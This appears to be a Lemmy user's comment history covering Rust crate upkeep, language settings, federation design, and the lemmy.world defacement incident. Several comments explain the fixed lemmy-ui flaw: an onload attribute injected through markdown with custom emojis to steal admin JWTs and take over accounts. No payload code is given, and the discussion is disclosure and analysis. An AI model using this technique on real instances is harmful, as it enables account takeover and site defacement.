- 0 Posts
- 15 Comments
It all depends on how “finished” the project is, and how much it has to track a moving ecosystem.
There’s a lot of crates that you can probably write once and be done with it. Like, a unit converter that’s not been updated since the first version of Rust is probably still just fine to use. A meter and a feet won’t change length anytime soon.
Even a GTK app that’s not been updated in 5 years that might not be a problem at all as long as it compiles. Windows is full of apps that were written 30 years ago and are still shipped basically unchanged. The calculator and notepad were two examples until Windows 10/11.
Another example: an FTP library or client. It’s basically a dead protocol at this point, so even if it’s not been updated in years, it’s likely fine and there’s not much to improve on.
It really depends on what it does and how much the rest of the world around it is changing and how complete the code is already.
Except not everyone has learned english, not everyone can especially older people.
Lemmy has that feature built-in that communities can support arbitrary languages. If you don’t want to see them you can literally just pick your languages in your profile, and it’ll automatically ignore what you can’t read.
A bit weird in practice, but it’s intended from the start to be available in everyone’s languages without having to make news-de, news-fr, news-es communities or have to rely on regional instances.
If we went with maximizing who can read your post then it should be in Chinese. The assumption that english is the default language for everything is very american.
Imagine a post from a tiny instance running on the cheapest VPS going viral and now all of the top Lemmy instances are trying to embed it from the tiny instance. It would immediately blow up.
That would increase the barrier to entry massively, and all that to save a few GBs of disk space. It’s small enough it wouldn’t even fill up half of my phone’s storage that I’m carrying in my pocket all the time.
What’s wasteful is the MBs of JavaScript you load on most modern website infested with all the video ads.
What Lemmy does is also very effective because each instance acts as a cache for the other instances. If any given post is viewed more than once from a remote instance, it ends up cheaper in CPU and bandwidth.
On bigger instances, the cost of federation is very small compared to the load of serving the instance’s users.
It also allows instances to have their own sorting algorithms, discovery algorithms, you name it. You have the data, you can crunch the numbers however you want for your users. You can develop your own spam filters and tools.
Even on my small 5 users instance, that’s 4 users worth of traffic that never hits the bigger instances. Probably more because I refresh the home page a few times a day whenever I open up my app to scroll a bit.
GitHub PR fixing the bug: https://github.com/LemmyNet/lemmy-ui/pull/1897/files
If your instance has custom emojis defined, this is exploitable everywhere Markdown is available. It is NOT restricted to admins, but can be used to steal an admin’s JWT, which then lets the attacker get into that admin’s account which can then spread the exploit further by putting it somewhere where it’s rendered on every single page and then deface the site.
If your instance doesn’t have any custom emojis, you are safe, the exploit requires custom emojis to trigger the bad code branch.
As for the version, my instance reports it as
0.18.1-2-ga6cc12afe
So it seems to be using some extra patches, but I can’t find that commit on GitHub which indicates it might not be public, or cherry-picked locally.
So with this in mind, either it’s just innocent performance patches, or someone potentially also introduced the markdown vulnerability.
Although it’s also entirely possible I suck and wasn’t able to reproduce it correctly/had wrong quoting or something. Hopefully the devs can shine some light in the details.
Only lemonparty (which then redirects to chaturbate) and the pedo image hosted in the pictrs of lemmy.world itself. I saw no evidence of anything else, as people said, it’s a pretty oldschool type of hack to disturb not spread malware.
But I didn’t dig that much further than that, and it’s only a snapshot of what I gathered before it got fixed. I Ctrl+F “lemonparty” in view source and pasted the JSON in VScode and that’s about it. Didn’t dig much deeper if that was just a red herring.
I tried to reproduce the exploit on my own instance and it appears that the official Docker for 0.18.1 is not vulnerable to it.
It appears that the malicious code was injected as an onload property in the markdown for taglines. I tried to reproduce in taglines, instance info, in a post with no luck: it always gets escaped properly in the <img alt="exploit here"> property as HTML entity.
lemmy.world appears to be running a git commit that is not public.
Not a whole lot - you might see some spam being federated from lemmy.world but I’d expect the lemmy.ml and lemmy.world admins will fix it, and them clean it up.
That’s probably good stress test to figure out how to handle that.
Just go to https://lemmy.world and see for yourself, although be careful it’s nasty.
As of now it looks like this:
And then it randomly redirects to gore sites like lemonparty or chaturbate or some pedo shit. It’s pretty bad.
The federation aspect adds complexity. A lot of complexity.
The only thing the fediverse might enable is nobodies like me can theoretically write social media software and actually get them successful without becoming a VC funded social media startup and have to resort to ads and premium tiers.
But things that couldn’t be done without the fediverse as a base? Nah not really.
Note that the concept of federation is really old. Emails are a form of federation. XMPP was federated too. Heck, Diaspora* is pretty old and tried to make open Facebook for almost as long as Facebook’s been mainstream.